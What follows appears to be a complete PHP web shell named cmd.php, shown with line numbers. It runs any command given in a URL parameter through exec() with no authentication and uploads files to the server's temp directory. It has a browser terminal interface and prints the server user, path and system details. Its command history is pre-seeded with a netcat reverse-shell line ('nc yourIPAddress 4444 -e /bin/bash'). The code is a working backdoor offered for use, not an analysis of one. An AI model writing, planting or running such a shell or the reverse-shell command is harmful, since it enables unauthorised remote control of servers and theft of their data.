cmd.php

1. <?php
2.     if(isset($_GET['id']))
3.     {
4.         $command = stripslashes($_GET['id']);
5.         exec($command . " 2>&1",$out);
6.         foreach($out as $o)
7.             echo $o . "n";
8.     }
9.         else if(isset($_FILES['file']['tmp_name']))
10.         {
11.             $name = basename($_FILES['file']['name']);
12.             if(move_uploaded_file($_FILES['file']['tmp_name'], $_SERVER['TEMP']?$_SERVER['TEMP']:"/tmp" . "/" . basename($_FILES['file']['name'])))
13.             {
14.                 echo "<textarea style='color:white;'>$name: Success!</textarea>";
15.             }
16.             else
17.             {
18.                 echo "<textarea style='color:white;'>$name: Failure!</textarea>";
19.             }
20.             exit();
21.            
22.         }
23.     else
24.     {
25. ?>
26. <html>
27. <head>
28. <title>PHP Shell</title>
29. <style>
30.  
31. * {
32.   margin: 0;
33.   padding: 0;
34.   border: 0;
35.   overflow-y: hidden;
36.   background-color:black;
37.   color: white;
38. }
39. html,body{
40. height: 100%;
41. }
42. .wrapper{
43.    min-height:100%;
44.    margin 0 auto -2em;
45. }
46. .output{
47.   color: white;
48.   font-family:"Courier New",monospace;
49.   font-size:12px;
50.   width: 100%;
51.   height: 90%;
52. }
53. .input{
54.   float: left;
55.   border-bottom:2px inset white;
56.   border-top:2px inset white;
57.   color: white;
58.   background-color: black;
59.   font-family:"Courier New",monospace;
60.   font-size:12px;
61.   width: 80%;
62.   height: 4%;
63. }
64. .info{
65.   clear: both;
66.   display: block;
67.   color:white;
68.   font-family:"Courier New",monospace;
69.   font-size:12px;
70.   width: 100%;
71.   height: 2em;
72.   margin-top: -2em;
73. }
74. .popup{
75.   position:absolute;
76.   left: 0px;
77.   top: 0px;
78.   z-index:10;
79.   border:5px;
80.   border-style:double;
81.   border-color:white;
82.   height:100px;
83.   width:400px;
84.   font-family:"Courier New",monospace;
85.   font-size:12px;
86.  
87. }
88. .push{
89.     height: 2em;
90. }
91. .form1{
92.   height:100%;
93. }
94. .button{
95.   border:0px;
96.   border-left:1px outset white;
97.   border-top:1px outset white;
98.   border-bottom:1px outset white;
99.   color:white;
100.   background-color: black;
101.   font-family:"Courier New",monospace;
102.   font-size:12px;
103.   text-align: center;
104.   height: 4%;
105.   width:10%;
106.   float:right;
107. }
108. p{ color:white; }
109. </style>
110.  
111. <script type="text/javascript">
112.  
113. http = new XMLHttpRequest();
114. var bash_history = new Array(10);
115. bash_history[0] = "nc yourIPAddress 4444 -e /bin/bash"
116. var history_newest = 0;
117. var history_oldest = 0;
118. var history_place = -1;
119. function submitform(myfield, e)
120. {
121.   var key;
122.   if(window.event)
123.     {
124.       key = window.event.keyCode;
125.     }
126.   else if(e) key = e.which;
127.   else return true;
128.  
129.     if(key == 13)
130.     {
131.         updateData(document.form1.input.value);
132.         document.form1.input.value="";
133.         return false;
134.     }
135.     else if(key == 38) // Up Arrow
136.     {
137.         if(history_place != history_oldest)
138.         {
139.             //go up in history
140.             if(history_place == -1)
141.             {
142.                 history_place = history_newest;
143.             }          
144.             else
145.             {
146.                 history_place--;
147.                 if(history_place == -1)
148.                 {
149.                     history_place += 10;
150.                 }
151.             }
152.             document.form1.input.value = bash_history[history_place];
153.         }
154.         else
155.         {
156.             document.form1.input.value = bash_history[history_oldest];
157.         }
158.    
159.         return false;
160.     }
161.     else if(key == 40) // Down Arrow
162.     {
163.         if(history_place == -1 || history_newest == history_oldest || history_place == history_newest)
164.         {
165.             history_place = -1;
166.             document.form1.input.value = "";
167.         }
168.         else
169.         {
170.             history_place = (history_place + 1)%10;
171.             document.form1.input.value = bash_history[history_place];
172.         }
173.         return false;
174.     }
175.     else
176.     {
177.         return true;
178.     }
179. }
180.  
181. function updateData(param)
182. {
183.     if(param == "")
184.     {
185.         return;
186.     }
187.     //manage bash_history
188.    
189.     history_newest = history_newest + 1;
190.     if(history_newest == 10)
191.     {
192.         history_newest = 0;
193.     }
194.     if(history_newest == history_oldest)
195.     {
196.         history_oldest = history_oldest + 1;
197.         if(history_oldest == 10)
198.         {
199.             history_oldest = 0;
200.         }
201.     }
202.     bash_history[history_newest] = param;
203.     history_place = -1;
204.  
205.     if(param == "clear")
206.     {
207.         document.form1.output.value = "";
208.         return;
209.     }
210.    
211.     document.form1.output.value+= "$: " + param + "n";
212.     document.form1.output.scrollTop = document.form1.output.scrollHeight;
213.     var myurl = <?php echo """ . $_SERVER['REQUEST_URI']. """; ?>
214.  
215.     http.open("GET", myurl + "?id=" + escape(param), true);
216.     http.onreadystatechange = useHttpResponse;
217.     http.send(null);
218.  
219. }
220.  
221. function useHttpResponse() {
222.   if (http.readyState == 4) {
223.     var textout = http.responseText;
224.     document.form1.output.value+=textout;
225.     document.form1.output.scrollTop = document.form1.output.scrollHeight;
226.   }
227. }
228.  
229. function fileUploadBox() {
230.   var uploadDiv = document.createElement("div");
231.   uploadDiv.setAttribute("align","center");
232.   uploadDiv.id="upload_box";
233.   uploadDiv.className = "popup";
234.   uploadDiv.innerHTML="<form id='file_upload' method='post' enctype='multipart/form-data' target='uploader'><input name='file' id='file' type='file' />
235. <input type='submit' name='action' value='Upload to <?php echo htmlentities($_SERVER['TEMP']?$_SERVER['TEMP']:"/tmp"); ?>' style='border:1px solid white;'/>
236. <iframe name='uploader' id='uploader' src='<?php echo "./" . $_SERVER['REQUEST_URI'];?>' width='0' height='0' style='display:none;'></iframe></form><button name='close_button' class='button' type='button' style='height:3em;width:30%;' onclick='var element = document.getElementById("upload_box"); element.parentNode.removeChild(element);' readonly=true>Close!</button>";
237.   document.body.appendChild(uploadDiv);
238.    
239. }
240. </script>
241.  
242. </head>
243. <body onLoad="document.form1.input.focus(); document.form1.output.scrollTop = document.form1.output.scrollHeight" onKeyDown="return submitform(this, event)">
244.  
245. <div class="wrapper">
246. <form name="form1">
247. <textarea name="output" class="output" readonly=true></textarea>
248. <script>document.form1.output.value="";document.title="PHP Shell: " + window.location.hostname;</script>
249. <textarea name="input" class="input"></textarea>
250. <button name="upload_button" class="button" type="button" readonly=true onclick="fileUploadBox();">Upload!</button>
251. <button name="submit_button" class="button" type="button" readonly=true onclick="updateData(document.form1.input.value); document.form1.input.value=''">Execute!</button>
252. </form>
253.  
254. <div class="push"></div>
255.  
256. </div>
257.  
258. <textarea name="info" class="info" readonly=true>
259. <?php
260. exec("whoami",$who);
261. $pwd=$_SERVER["DOCUMENT_ROOT"];
262. $sys=PHP_OS . ", " .$_SERVER['SERVER_SOFTWARE']. ", " . phpversion();
263. echo "user: $who[0]tlocation: $pwdtsystem: $sys";
264. ?>
265. </textarea>
266. </body>
267. </html>
268. <?php
269.     }
270. ?>